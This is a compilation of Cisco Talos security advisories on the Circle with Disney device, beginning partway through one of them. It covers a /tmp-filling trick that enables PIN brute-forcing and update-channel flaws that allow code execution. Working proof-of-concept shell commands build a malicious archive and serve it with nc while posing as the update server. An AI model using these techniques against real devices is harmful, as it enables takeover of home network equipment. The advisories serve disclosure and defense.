If no failed authentication attempts are made since system boot, failed_token_info won’t exist in /tmp. This means that if an attacker is able to keep /tmp completely filled, the apid binary won’t ever be able to create failed_token_info, thus making the pin bruteforce possible in practice. Moreover note that if a DoS attack is available for rebooting the device, it can be used to clear the whole /tmp directory. Since failed_token_info is never saved in non-volatile storage, a slow bruteforce can be performed by testing 3 pins per reboot.

Without using a DoS, an attacker needs to fill /tmp before starting the bruteforce. To achieve this, a combination of 4 techniques can be used.

**1- /tmp/versions**

Once every hour, /mnt/shares/usr/bin/firmware_updater.sh is invoked to check for updates. This script downloads a file containing the latest version of the firmware via HTTP and stores it in /tmp/versions:

    ...
    /tmp/wget -q -O /tmp/versions  "http://download.meetcircle.co/dev/firmware/check_version.php?DEVID=$MAC&FVER=$my_firmware_ver&UVER=$my_updater_ver&DBVER=$my_database_ver&ETH=$eth_connected&IP=$IP$EXTRA"
    ...
    

By exploiting this behavior, an attacker can send a 31MB versions file and fill /tmp.

Unfortunately, since many components are using /tmp, the failed_token_info might still be written after some time: the main problematic file is /tmp/iplist, which can shrink depending on the network activity. This is why the techniques described in the following paragraphs are needed as well.

**2- /tmp/postfile.bin**

apid provides a way for restoring a previously-saved configuration and for upgrading the firmware. This can be done using the api command /api/CONFIG/restore, which is handled in function sub_417528. At high level it works as follows:

    if query == "/api/CONFIG/restore" or (query == "/api/UPLOAD_FIRMWARE" and substr(srcip, 0, 10) == "10.123.234")
        save_postfilebin()
        if check_token()
            ...do update/restore...
    

save_postfilebin() will save the uploaded firmware (or configuration file) to /tmp/postfile.bin. As we can see, this function is called before checking if the user supplied a valid token, allowing any unauthenticated user to upload such file. Note that even if the token turns out to be wrong, the file won’t be deleted. The size limit of the upload is almost 5MB, so it cannot be used alone to fill /tmp.

**3- /tmp/iplist**

The arp2 binary keeps a list of recently-seen hosts on the network by monitoring ARP requests and saves them in /tmp/iplist.

When operating on the file, arp2 uses fopen with mode “w+”. This means that as soon as fopen returns the /tmp/iplist file will be truncated. If, at the same time, apid tries to create failed_token_info, it will succeed since in that instant there will be some free space in /tmp.

To avoid space to be freed by iplist, it’s important that the bruteforce attack only starts when iplist has a size of 0, so it won’t ever be able to grow. To do this, an attacker could upload a /tmp/postfile.bin file (to try to fill the little space left in /tmp) in the same moment that iplist gets truncated by apid. In order to maximize the likelihood of this condition, a series of spoofed ARP requests can be continuously sent to the device, forcing it to update iplist, while in parallel uploading a rather small configuration file.

**4- lockout feedback**

It’s useful, during bruteforce, to know whether pin attempts are discarded because of the lockout mechanism. Indeed, it’s possible to get this kind of feedback. At high level this is a simplification of how the token request procedure works:

    if (failed_token >= 3 and time() - failed_token_time < 15 * 60)
        return "token request failure"
    else
        appid = get_param(query, "appid")
        if not appid:
            return "token request failure - no app id specified"
        if not good_pin(pin):
            return "token request failure"
        else
            return new_token()
    

As we can see, if a token request is sent without an appid and requests are not locked out, the error returned is “token request failure - no app id specified”. Note however that in this case pins are not tested. This feedback can be used every once in a while, just to ensure that pins are effectively verified during bruteforce.

**Complete attack**

A complete attack sequence could go like this:

    1- impersonate the `download.meetcircle.co` server, e.g. via MITM.
    2- listen on port 80 for a GET request of "/dev/firmware/check_version.php" and return a big file (> 30MB).
    3- in parallel, for about 500 POST requests:
       A- continuously send spoofed ARP packets with different IP source, to trigger `iplist` updates.
       B- continuously send POST requests for writing `postfile.bin`.
    4- `/tmp` should be completely full by now.
    5- bruteforce each possible PIN and every 10 attempts check whether requests have been locked.
    

**Timeline**

2017-07-13- Vendor Disclosure  
2017-10-31 - Public Release

Discovered by Cory Duplantis, Yves Younan, Marcin 'Icewall' Noga, Claudio Bozzato, Lilith Wyatt <(^\_^)>, Aleksandar Nikolic, and Richard Johnson of Cisco Talos.

CVE-2017-2864: TALOS-2017-0370 || Cisco Talos Intelligence Group

An exploitable vulnerability exists in the database update functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause the device to execute arbitrary code. An attacker needs to impersonate a remote server in order to trigger this vulnerability.

**Summary**

An exploitable vulnerability exists in the database update functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause the device to execute arbitrary code. An attacker needs to impersonate a remote server in order to trigger this vulnerability.

**Tested Versions**

Circle with Disney 2.0.1

**Product URLs**

https://meetcircle.com/

**CVSSv3 Score**

9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-300: Channel Accessible by Non-Endpoint (‘Man-in-the-Middle’)

**Details**

Circle with Disney is a network device used to monitor internet use of children on a given network.

A cronjob exists which executes the script “firmware\_updater.sh” every hour:

    #!/bin/sh
    ...
    my_updater_ver=`cat /mnt/shares/UPDATER_VERSION`;
    my_database_ver=`cat /mnt/shares/DATABASE_VERSION`;
    my_firmware_ver=`cat /mnt/shares/VERSION`;
    ...
    /tmp/wget -q -O /tmp/versions  "http://download.meetcircle.co/dev/firmware/check_version.php?
    DEVID=$MAC&FVER=$my_firmware_ver&UVER=$my_updater_ver&DBVER=$my_database_ver&ETH=$eth_connected&IP=$IP$EXTRA"
    grep updater_ver /tmp/versions || exit 1
    updater_ver=`awk '/updater_ver/{print $2}' /tmp/versions`;
    database_ver=`awk '/database_ver/{print $2}' /tmp/versions`;
    firmware_ver=`awk '/firmware_ver/{print $2}' /tmp/versions`;
    ...
    if [ $force = 0 ] ; then
            #check time window
            current_hour=`date +%k`
            if [ $current_hour -gt 4 -o $current_hour -lt 1 ]; then
                    echo "Outside of firmware/database update window (1 - 5 am) ... canceling update check"
                    exit 1
            fi
            #check last API command
            if [ -s /mnt/shares/usr/bin/last_api ]; then
                    time_last_api=`date -r /mnt/shares/usr/bin/last_api +%s`
                    time_now=`date +%s`
                    time_elapsed=`expr $time_now - $time_last_api`
                    if [ $time_elapsed -lt 3600 ]; then
                            echo "API command within last hour ... canceling firmware update check"
                            exit 1
                    fi
            fi
    fi
    ...
    #update database
    if [ "$database_ver" != "0.0" -a "$my_database_ver" != "$database_ver" ] ; then
            mkdir -p /mnt0
            mkdir -p /mnt/tmp
            cd /mnt/tmp;
            mount -t ext4 -o rw,noatime,nodiratime /dev/sda2 /mnt0
            /tmp/wget -q -O /mnt0/database_1.tar.gz "http://download.meetcircle.co/dev/firmware/get_database.php?
    DEVID=$MAC$EXTRA&MYVER=$my_database_ver"
            if  [ -s /mnt0/database_1.tar.gz ] ; then
                    mount -o remount,rw,noatime,nodiratime /dev/sda3 /mnt #remount to remove sync
                    tar xzf /mnt0/database_1.tar.gz
                    if [ -s /mnt/tmp/update_database.sh -a -s /mnt/tmp/shares/DATABASE_VERSION -a -s /mnt/tmp/dbmd5 ] ; then
                            if md5sum -s -c /mnt/tmp/dbmd5 ; then
                                    cd /mnt;
                                    cp -lfr /mnt/tmp/* /mnt/
                                    rm -rf /mnt/tmp
                                    mv -f /mnt0/database_1.tar.gz /mnt0/database.tar.gz
                                    umount /mnt0
                                    sh /mnt/update_database.sh
                                    exit 0
                            fi
                    fi
            fi
            cd /mnt;
            rm -f /mnt0/database_1.tar.gz
            rm -rf /mnt/tmp
            umount /mnt0
            echo "error downloading and installing database"
            exit 1
    else
            echo "not updating database: database_ver=$database_ver my_database_ver=$my_database_ver";
    fi
    

The script above installs updates for the device if new versions are available.

Latest versions are retrieved using an HTTP request. If the update script is called within 1am and 4am and no API commands were issued in the last hour, the database will be updated when a new version is available.

The new version for the database is retrieved using an HTTP request: an archive is downloaded from “download.meetcircle.co”, it is extracted in “/mnt/tmp” and, if a few conditions are met, the script “update\_database.sh” present in the archive is executed.

Since both HTTP requests are unauthenticated, an attacker able to impersonate the remote server could return a malicious archive containing a custom “update\_database.sh” script.

**Exploit Proof-of-Concept**

The following proof of concept shows how to execute the “power\_down.sh” script on the device. An attacker needs to impersonate the server “download.meetcircle.co” in order to answer the HTTP requests.

    $ echo "/mnt/shares/usr/bin/scripts/circle/power_down.sh" > update_database.sh
    $ chmod 777 update_database.sh
    $ md5sum update_database.sh > dbmd5
    $ mkdir shares
    $ echo 2.3 > shares/DATABASE_VERSION
    $ tar czf evil.tgz update_database.sh dbmd5 shares
    $ req1="$( echo -en "HTTP/1.0 200 OK\n\nupdater_ver 0.0\nfirmware_ver 0.0\ndatabase_ver 2.4\n" )"
    $ req2="$( echo -en "HTTP/1.0 200 OK\n\n"; cat evil.tgz )"
    $ for r in $req1 $req2; do echo $r | sudo nc -vv -l -p 80; done
    

**Timeline**

2017-08-02 - Vendor Disclosure  
2017-10-31 - Public Release

Discovered by Claudio Bozzato and Lilith Wyatt <(^\_^)> of Cisco Talos.

CVE-2017-2883: TALOS-2017-0390 || Cisco Talos Intelligence Group

An exploitable vulnerability exists in the servers update functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause the device to overwrite sensitive files, resulting in code execution. An attacker needs to impersonate a remote server in order to trigger this vulnerability.

**Summary**

An exploitable vulnerability exists in the servers update functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause the device to overwrite sensitive files, resulting in code execution. An attacker needs to impersonate a remote server in order to trigger this vulnerability.

**Tested Versions**

Circle with Disney 2.0.1

**Product URLs**

https://meetcircle.com/

**CVSSv3 Score**

9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-73: External Control of File Name or Path

**Details**

Circle with Disney is a network device used to monitor internet use of children on a given network.

A cronjob exists which executes the script “check\_circleservers.sh” every 4 hours:

    #!/bin/sh
    MAC=`cat /tmp/MAC`;
    VER=`cat /tmp/circleservers.ver`
    CIRCLE_ROOT=`cat /tmp/CIRCLE_ROOT`
    rm -f /tmp/circleservers.bin /tmp/circleserver.tgz
    /tmp/wget -q -t 1 -T 30  -O /tmp/circleservers.bin "http://download.meetcircle.co/dev/firmware/get_circleservers.php?
    DEVID=$MAC&VER=$VER" || exit
    if [ -s /tmp/circleservers.bin ]; then
        /tmp/aescrypt -d -p a801e2f7bd4104073a296dc5c63857cf -o /tmp/circleservers.tgz /tmp/circleservers.bin || exit
        [ -s /tmp/circleservers.tgz ] || exit
        cd /tmp/
        tar zxf /tmp/circleservers.tgz
            if [ -s /tmp/circleservers ]; then
                $CIRCLE_ROOT/ipsetload circleservers /tmp/circleservers
                    cp -f /tmp/circleservers $CIRCLE_ROOT/scripts/circleservers.list
            fi
    fi
    rm -f /tmp/circleservers.bin /tmp/circleservers.tgz
    

The script above downloads an encrypted tar archive using an HTTP request, which gets then decrypted and extracted in the “/tmp” directory. Since the encryption password is known and the http connection is not authenticated, an attacker able to impersonate the remote server could overwrite any file in the “/tmp” directory. Since the script itself executes “/tmp/aescrypt”, one of the ways to exploit this bug is to overwrite “aescrypt” with a custom executable: this allows an attacker to execute arbitrary code on the next call of the script.

**Exploit Proof-of-Concept**

The following proof of concept shows how to execute the “power\_down.sh” script on the device. An attacker needs to impersonate the server “download.meetcircle.co” in order to answer to the HTTP requests.

    $ echo "/mnt/shares/usr/bin/scripts/circle/power_down.sh" > aescrypt
    $ chmod 777 aescrypt
    $ tar czf evil.tgz aescrypt
    $ aescrypt -e -p a801e2f7bd4104073a296dc5c63857cf -o evil.bin evil.tgz
    $ ( echo -en "HTTP/1.0 200 OK\nContent-Length: $(stat -c%s evil.bin)\n\n"; cat evil.bin ) | sudo nc -vv -l -p 80
    $ ( echo -en "HTTP/1.0 200 OK\nContent-Length: 1\n\nX" ) | sudo nc -vv -l -p 80
    

**Timeline**

2017-08-02 - Vendor Disclosure  
2017-10-31 - Public Release

Discovered by Claudio Bozzato and Lilith Wyatt <(^\_^)> of Cisco Talos.

CVE-2017-2882: TALOS-2017-0389 || Cisco Talos Intelligence Group

An exploitable vulnerability exists in the torlist update functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause the product to run an attacker-supplied shell script. An attacker can intercept and alter network traffic to trigger this vulnerability.

**Summary**

An exploitable vulnerability exists in the torlist update functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause the product to run an attacker-supplied shell script. An attacker can intercept and alter network traffic to trigger this vulnerability.

**Tested Versions**

Circle with Disney 2.0.1

**Product URLs**

https://meetcircle.com/

**CVSSv3 Score**

9.6 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-73: External Control of File Name or Path

**Details**

Circle with Disney is a network device used to monitor and restrict internet use of children on a given network. When connected to a given network and configured, it immediately begins arp poisoning all other devices on the network, such that it can validate and restrict all traffic as is seen fit by the parent/administrator of the device.

Periodically, the device will query outbound towards the meetcircle.co domain, attempting to grab the latest list of known Tor addresses as a gunzipped tarball, shown below in the following snippet:

    #!/bin/sh
    MAC=`cat /tmp/MAC`;
    TORVER=`cat /tmp/torlist.ver`
    CIRCLE_ROOT=`cat /tmp/CIRCLE_ROOT`
    rm -f /tmp/torlist.new.tgz
    /tmp/wget -t 1 -T 30 -q -O /tmp/torlist.new.tgz "http://download.meetcircle.co/dev/firmware/get_torlist.php?      DEVID=$MAC&VER=$TORVER" || exit
    if [ -s /tmp/torlist.new.tgz ]; then
        #sanity check tgz file size. size in kbytes
        gzsize=`du /tmp/torlist.new.tgz | cut -f 1`
        minsize=5
        if [ $gzsize -gt $minsize ]; then
            cd /tmp
            tar zxf /tmp/torlist.new.tgz
            if [ -s /tmp/torlist ]; then
                $CIRCLE_ROOT/ipsetload torlist /tmp/torlist
            fi
        fi
    fi
    rm -f /tmp/torlist.new.tgz
    

Unfortunately, since this wget request is not using HTTPS, it becomes trivial for an attacker to supply their own tarball, which would be extracted, allowing an attacker to overwrite any file in the “/tmp” directory. A sample exploit would be to zip up a script named ‘wget’, such that it would executed in subsequents run of this check\_torlist.sh script, (which is scheduled via a cronjob).

**Timeline**

2017-08-02- Vendor Disclosure  
2018-10-31 - Public Release

Discovered by Claudio Bozzato and Lilith Wyatt of Cisco Talos.

Tag

#php